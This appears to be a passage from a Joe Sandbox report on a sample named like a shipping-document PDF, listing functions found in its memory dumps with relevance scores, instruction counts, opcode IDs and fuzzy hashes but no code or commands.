Opcode ID: 82af2bee93314952b65ae7047eeb6eb16cfd46e0cd849a3406c79dd9a1a1de5e
Instruction ID: cdcbd371e3543bb34a22ee5cd4c8f1b1e0985704a72989bab33809b7e83c7f5b
Opcode Fuzzy Hash: 82af2bee93314952b65ae7047eeb6eb16cfd46e0cd849a3406c79dd9a1a1de5e
Instruction Fuzzy Hash: 1B71ABB9600A00CFCB18DF29C588959BBF2BF8961471589A9E54ACB372DB72EC45CB50

Function 04F952E0 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 263205c7106f6d05c8b9bf1e32358e28fd0b72c8959811f11eafb0fadc12f689
Instruction ID: 5754cf50ea91ed80d81b84141b49ddfe2a021aab998dd5b8ef6c555ef4d80b61
Opcode Fuzzy Hash: 263205c7106f6d05c8b9bf1e32358e28fd0b72c8959811f11eafb0fadc12f689
Instruction Fuzzy Hash: 5C51D232A002059FDF16EFA8D9546BEBBF6EF84300F14856AD006A7395DF74AD46CB81

Function 06B67BE9 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf3c1e68963343202daeb1e56d4d2224024645e801d00c288ef63d504b7c2d69
Instruction ID: 7bd39a2be15f19793f4e88aadc9f55acb315239d932c0884a6a908f150840ab4
Opcode Fuzzy Hash: cf3c1e68963343202daeb1e56d4d2224024645e801d00c288ef63d504b7c2d69
Instruction Fuzzy Hash: CB616DB0E041198FDB44CFAAC5A06ADBBF1FF45304F2489A6E1669B255DB38DC42CB91

Function 04F9BC29 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1add58fd29f7e71cca155e68f1ab505afae67abaea85c59cd77e3d76c62dc6bd
Instruction ID: 56de04266d5c44b3e7b6adf56fa19c54633c66faa1c66625930d493e3f75972a
Opcode Fuzzy Hash: 1add58fd29f7e71cca155e68f1ab505afae67abaea85c59cd77e3d76c62dc6bd
Instruction Fuzzy Hash: 9371BCB9600A00CFCB18DF29C588959BBF2BF8921471589A9E54ACB372DB72EC45CB50

Function 04F9BA48 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 925d65896c9881272bbeb6e593d0a4af1609de102e575b41920ea7da0cb73b50
Instruction ID: 3e59de86bddcc0ac56e0466d9bda2f0738ed0e2bb6744ea81c41c3de4178fdb8
Opcode Fuzzy Hash: 925d65896c9881272bbeb6e593d0a4af1609de102e575b41920ea7da0cb73b50
Instruction Fuzzy Hash: 1671AE74A046068FDB44CF69D584999FBF1BF48314B0986A9E80ADB356E730EC86CF90

Function 04F9EB78 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d807e3c1672cb26a3d37d41c06582e33a66e4161974af15b52c8ed8a238b3d5a
Instruction ID: 1098436acbdffe588c0e73b1a902265247e3adf91da617fff6e86e467cfbb5af
Opcode Fuzzy Hash: d807e3c1672cb26a3d37d41c06582e33a66e4161974af15b52c8ed8a238b3d5a
Instruction Fuzzy Hash: 92616930A106008FEB14EF79C894B9977F6FF89314F1585B8D44A9B3A5DB71AC0ACB60

Function 06B673F7 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb50b8981e120a63d6df2e2545db526a33f340412da01fdc451a3d11d0af379
Instruction ID: 7851ea4b39c9e7a55e8e1f6d5d2d67318bc517118a026661dab7396f5e6d3d52
Opcode Fuzzy Hash: cdb50b8981e120a63d6df2e2545db526a33f340412da01fdc451a3d11d0af379
Instruction Fuzzy Hash: 2C51D6B0E00105DFDB54DFEAC9517AEBBB2FF44700F108576E956A7384DB3899428B91

Function 06B64F18 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea6e3f5e046282bb371be306bef742fa2caafa467bf97bc251e68c7d9d7bc5f4
Instruction ID: fe8793122091fa71c053cf6a3d76af5624e3d9b6fcad10d6017960b3ea014397
Opcode Fuzzy Hash: ea6e3f5e046282bb371be306bef742fa2caafa467bf97bc251e68c7d9d7bc5f4
Instruction Fuzzy Hash: 3F51AF31F002149BCB04AFB8D545AAEBBB3BF89300F14C4A9D9956B399CF356D59CB81

Function 06B64F28 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bd8151ef3568814d5e6eb95adfed8961d43dac1a8023191b6cb228a4aee15c3
Instruction ID: 7cd856853aecf76a3a0506b561f27476157d6207c2aceac7767afd747f6d1b1b
Opcode Fuzzy Hash: 0bd8151ef3568814d5e6eb95adfed8961d43dac1a8023191b6cb228a4aee15c3
Instruction Fuzzy Hash: C551B031F002149BC704AFB8D545AAEBBB3BF88300F14C4A9DE956B399CF316959C781

Function 04F9CCAA Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99c7662fa1ca1d08c6aa943f8cc3c5f2f04c46de9cfef8cc3feb297979227d17
Instruction ID: d50af0d36af157072562e0ecddd3a200ef5cfb645b44471c05ba27a416492819
Opcode Fuzzy Hash: 99c7662fa1ca1d08c6aa943f8cc3c5f2f04c46de9cfef8cc3feb297979227d17
Instruction Fuzzy Hash: D551067191070ADFCB01EF68C880999FBF5FF49310B14875AE859EB255EB70EA85CB80

Function 04F971E8 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0276e789f09c70c9b291a0e0a3ae17e1973c44efc902fff7e98770522fc2133b
Instruction ID: 5c71d50d0433923409c272661666c1c615d19d942294053f90f46672c416b9c8
Opcode Fuzzy Hash: 0276e789f09c70c9b291a0e0a3ae17e1973c44efc902fff7e98770522fc2133b
Instruction Fuzzy Hash: 7051F734A20605CFCB04EF68C89499DBBF6FF89704B1585A9E5069B371EB71ED45CB40

Function 06B60338 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6ef1f8787dd515ca91f17e58cc500fac0b6b3538c348ccef07a590d877edab6
Instruction ID: 6753edd64999f1d412a6de1863f496140bc15e23103957cda5a906f335a58023
Opcode Fuzzy Hash: b6ef1f8787dd515ca91f17e58cc500fac0b6b3538c348ccef07a590d877edab6
Instruction Fuzzy Hash: 19517F70E01204CFCB65EF6AD658A9EBBF2EF88311F1484A9E505AB361DB75CC42CB50

Function 04F971F8 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693382b59dc8fe3bbf2efe922ad0f01d4193700846af5662d1e8b88700ea56b5
Instruction ID: c4044b4a8cbcd0e1ac40bd43c245ad9377319c2c9f4e7b49363d3c055c18497a
Opcode Fuzzy Hash: 693382b59dc8fe3bbf2efe922ad0f01d4193700846af5662d1e8b88700ea56b5
Instruction Fuzzy Hash: C251D634A20605CFCB04EF68C89899DB7F6FF89704B1585A9E5069B371EB71ED46CB40

Function 06B64F4D Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af57fba0b55f17b742752dd74132506adc1942965c48b264ee7881f8249d5040
Instruction ID: 3f6e36e4071d7755a1d0720e41dc6badf1c12e1d7c900daea91644f924eb7a57
Opcode Fuzzy Hash: af57fba0b55f17b742752dd74132506adc1942965c48b264ee7881f8249d5040
Instruction Fuzzy Hash: B451C235B001149BC704AFB8D545AADB7B3BF88300F14C4A9DE916B399CF356D59C781

Function 06B641C8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 271d785d862faf52a6a957fd5c76384bbf61ea7e71583b8b6673b180d8e58275
Instruction ID: 4e26919cd6cc7cdfc395531e63ff51f08e236134b82b142ced1c770edb9cf4f3
Opcode Fuzzy Hash: 271d785d862faf52a6a957fd5c76384bbf61ea7e71583b8b6673b180d8e58275
Instruction Fuzzy Hash: 8D418D74A11605CFDB58DFAAE954AAEB7F6FF84300F2081B9E806D7250DE38C841CB91

Function 06B63E68 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92ee48a71f767dd47c5ef388afa422ceb96d0ffca7b942982335bf0c26501fc5
Instruction ID: d8b0f0b97ad6c3a102990418d2d492b1c4c2fcda0d5562da60a462c7675c18c5
Opcode Fuzzy Hash: 92ee48a71f767dd47c5ef388afa422ceb96d0ffca7b942982335bf0c26501fc5
Instruction Fuzzy Hash: AC517635E10609DFCB00EFA8D8808EDF7B5FF89300F10856AE516AB321EB71A955CB91

Function 04F9F270 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd62ed1fad3105625f821e37a3959ec42eea5ffbb50a06d1606616fec8256da6
Instruction ID: 78fb1aaaaf43446430a992ad83c164dfda04f6da7c47c56b5d7769147749583b
Opcode Fuzzy Hash: cd62ed1fad3105625f821e37a3959ec42eea5ffbb50a06d1606616fec8256da6
Instruction Fuzzy Hash: 6B411835B012198FEF19DF69C854AAD77F5BF89705B6404A9D402EB3A1DB39EC02CB60

Function 04F98B60 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bd555c1d1e199cfcd5a84ed19cf0dbcffc5eb41465cb8c43a571d0151765f5f
Instruction ID: 2c75531d236797970868e597e29a85bef310607857bc13d770533c9839e46410
Opcode Fuzzy Hash: 1bd555c1d1e199cfcd5a84ed19cf0dbcffc5eb41465cb8c43a571d0151765f5f
Instruction Fuzzy Hash: DB418A75E1122A8FEF15EF69D854AADBBF1EF8A351F144025D805A7314DB30AC4ACBA0

Function 04F955F8 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4c9822655fd3b5247156091a1de7d4a950f032119f60758bfdea3f8ac6d1d21
Instruction ID: a30743e5ebd9b77422ac4ef7b203cac02f2a5c6c437e8a89870944f0cacedcaa
Opcode Fuzzy Hash: b4c9822655fd3b5247156091a1de7d4a950f032119f60758bfdea3f8ac6d1d21
Instruction Fuzzy Hash: 4C510835A01209EFEF15DF94D990BAEBBF2EF48310F218069E905A7351CB31AD12CB51

Function 06B62170 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e3d6dd0c76fe99c97b525bb7522f5b122fad3900025e0286947415b6ec8d0d8
Instruction ID: 5657f062224462d46d6a8a4a8ba7f376c4a4d5361fe57305593821e1bbf12d1a
Opcode Fuzzy Hash: 4e3d6dd0c76fe99c97b525bb7522f5b122fad3900025e0286947415b6ec8d0d8
Instruction Fuzzy Hash: FC416C74E112089FDB44EFA9D854AADBBB2FF89310F1485A9F401BB3A1DB34D941CB90

Function 06B60328 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2528c5580fd03d0a86332eaa65b46dd00a39def688fbeab458b4e5a894bdb0d3
Instruction ID: 37c66bde662bcf88d20c8d6cfd33c4644f870dd84e3445fd0c67967c1948dc07
Opcode Fuzzy Hash: 2528c5580fd03d0a86332eaa65b46dd00a39def688fbeab458b4e5a894bdb0d3
Instruction Fuzzy Hash: AE414470F012048FCB64EF6AC69869EBBF2EF98315F1484A9E5059B365DB75CC42CB50

Function 06B62180 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5df50be54b1dd7c3e3a22adf752be11944fc1e7c39002ea1eac554223d182b58
Instruction ID: 6a31f13900211533d96c4c85adbbe757fb776719957e0105718e9dbae971643b
Opcode Fuzzy Hash: 5df50be54b1dd7c3e3a22adf752be11944fc1e7c39002ea1eac554223d182b58
Instruction Fuzzy Hash: 25414C70E112089FDB44EFA9D854AADBBB6FF89311F1485A9F401BB3A0DB34D941CB90

Function 04F95068 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 460616a3c2ee7e4bd7af82ed48e782a240e287fc9d24494d4206d9d4766b9c6f
Instruction ID: 51e0c5ec5ba325e4e62ab64f84071558138bde8569034d9ea52de419ef4d10d6
Opcode Fuzzy Hash: 460616a3c2ee7e4bd7af82ed48e782a240e287fc9d24494d4206d9d4766b9c6f
Instruction Fuzzy Hash: DD414235A00204CFCB15DF68D695ADEB7F1EF88704F108469D51AAB361DB72AD45CF90

Function 04F95058 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68f8b85ae2d5cbcb7ebd3c6481e24403f40df7ce3de7e70410fed742685c92f5
Instruction ID: 9f555505433997fd7b8234ee33e1538215f7e260ecd5fb28b986cd43978ae136
Opcode Fuzzy Hash: 68f8b85ae2d5cbcb7ebd3c6481e24403f40df7ce3de7e70410fed742685c92f5
Instruction Fuzzy Hash: 3E415035A00204CFCB15EF68D691ADEB7F1EF88704F108469E41AAB362DB72AD45CB90

Function 04F979F8 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98af29e728cbc57a45b80496995cea343699ad4eed9de8ad642207f5c2c1c3cd
Instruction ID: d10194dc6fa0c07305d03521116e9dc2692e16dc5d5f878d2a6a8565ed04a39f
Opcode Fuzzy Hash: 98af29e728cbc57a45b80496995cea343699ad4eed9de8ad642207f5c2c1c3cd
Instruction Fuzzy Hash: D9415B31B10219DFEF15EFA9D8806ADB7F2AF48308F144529E505E7360EB74AD42CB91

Function 04F9AFB8 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f0e42bc3846da93f401936046e19f87f618b0e08b09feb02edb1429a3986ff6
Instruction ID: 29981371ef73b320dd545b041130353df391276e7b19fed8b93c352fda47fc29
Opcode Fuzzy Hash: 6f0e42bc3846da93f401936046e19f87f618b0e08b09feb02edb1429a3986ff6
Instruction Fuzzy Hash: 99414F30A10709CFDB04EF68C884ADDBBF6FF89304F008559E5156B365EB71AA46CB81

Function 04F95E44 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdcc984e56ab794f86f1fa4ae8432fa06d92d6e43c0db85d6122568a5a981899
Instruction ID: 56f7877ae6dbb638dcd1cbabf71f4977ec6ee087b5bac45dae34f524aa4b80e5
Opcode Fuzzy Hash: cdcc984e56ab794f86f1fa4ae8432fa06d92d6e43c0db85d6122568a5a981899
Instruction Fuzzy Hash: 1B414D30A10709CFDB04EF68C9849ADBBF6FF89304F018559E5166B365EB71A946CB81

Function 04F974A0 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72b13c0c8edf812be0e32355320dd21ebf4af28d15ddf1df2f9d342f7cb2fb4f
Instruction ID: 019b22ef5aa073fa3c45f2ac968bdfa952496eef84ecfccc248f1380b0b66d14
Opcode Fuzzy Hash: 72b13c0c8edf812be0e32355320dd21ebf4af28d15ddf1df2f9d342f7cb2fb4f
Instruction Fuzzy Hash: 58418F31A00706CFCB14EF39D4944AABBF2FF893147148A6DD419A7391EB31E906CB90

Function 04F96FD9 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 359c83d8cad9bee731598ddf30e17cd203aadfcaf17e6e493a6ea86f9ecda7d7
Instruction ID: 38b1104cddbc28f1e0b2df4dc719223245e966cbacfee468fbd3f565ada44016
Opcode Fuzzy Hash: 359c83d8cad9bee731598ddf30e17cd203aadfcaf17e6e493a6ea86f9ecda7d7
Instruction Fuzzy Hash: C8411435B106009FDB05EF69C898A6E77E6FF89700B2584A9E506DB371CB71EC01CB51

Function 06B6514E Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08719b9149ebbaee841f327f6d68880b16ac4e2c83ebdddc515cdec3deb553b0
Instruction ID: ed149d03091ab272266f384098d00f1701a29ddc7d62d0b07697fdc019b7f2f2
Opcode Fuzzy Hash: 08719b9149ebbaee841f327f6d68880b16ac4e2c83ebdddc515cdec3deb553b0
Instruction Fuzzy Hash: C431D271B4E3804FD7965B7498283793FF2AB8A210F0944EBE582CB2D7C9688C15C762

Function 06B64018 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6185b34cb9f35aac5afe5497979280f4bbeb66404f609620d74f91e2093bb009
Instruction ID: e203ba6f4dc5c314540705432045050dbd1fd02cb0333b1f206867f1fb8b7c05
Opcode Fuzzy Hash: 6185b34cb9f35aac5afe5497979280f4bbeb66404f609620d74f91e2093bb009
Instruction Fuzzy Hash: D4318071E00618DFCB14EFA9D9505AEBBF6FF88200F10C2AAE805A7324DB759D45CB91

Function 06B641A0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 156d4959115b8627c231f020fc7b8f5c0b8d23acec7d496e53d6b897d0fa5675
Instruction ID: dfd0f6a1441888e2c83bd3f503102a8ae4a7409a7026205052a8b85babc2a776
Opcode Fuzzy Hash: 156d4959115b8627c231f020fc7b8f5c0b8d23acec7d496e53d6b897d0fa5675
Instruction Fuzzy Hash: E731E2B4A117418FDB55DF66D944AAE7BF3FF85300F2481B9E802D7252CE388805CB92

Function 04F99317 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cebfd7130926a807d9aa50a8bce9e856fc1ebfb0251b233989957276b14bb7fe
Instruction ID: 8c05bf9028e2983fa333d03344d8cb19f2176a6cda79805f52ed718d31bbd479
Opcode Fuzzy Hash: cebfd7130926a807d9aa50a8bce9e856fc1ebfb0251b233989957276b14bb7fe
Instruction Fuzzy Hash: 38410775A0020A9FDB00DF69D88499AFBB5FF89310B14C269E818AB315E770A985CF90

Function 04F96FE8 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95c212dd47b066fbf3f3bcc2a0102925e8ee4450169ab1716257ef0a6e807d86
Instruction ID: 0e59b032fe005cf8389e6f5a9da92e7bc308d11191887dcff6f6f0ba6fc82a57
Opcode Fuzzy Hash: 95c212dd47b066fbf3f3bcc2a0102925e8ee4450169ab1716257ef0a6e807d86
Instruction Fuzzy Hash: 7C311235B106009FDB05EF69C89896E7BE6FF8AB05B1584A9E506DB371CB71EC01CB50

Function 04F9BA38 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e4e4316a8f2196a3e20b9f831a773b847a1cb2d4503753eb450332198dbd2ce
Instruction ID: 02a6021f7a2d6dc89cd365abe4cb59e26c6d2a0d1ac4b59782514fe48e2734ea
Opcode Fuzzy Hash: 3e4e4316a8f2196a3e20b9f831a773b847a1cb2d4503753eb450332198dbd2ce
Instruction Fuzzy Hash: DD411B75A002068FDB14CF28D584A99FBF1FF49300B1586A9E80ADB355E730FD86CB90

Function 04F979D8 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ba65a1b51581911c4e9f487c33e65c884f127cccf351abb80d96c3c3cf45aec
Instruction ID: 2d22f14cd42c9b5f3effdb06306fa78b0ee1b2c2624d0ad6f5478a92f661346d
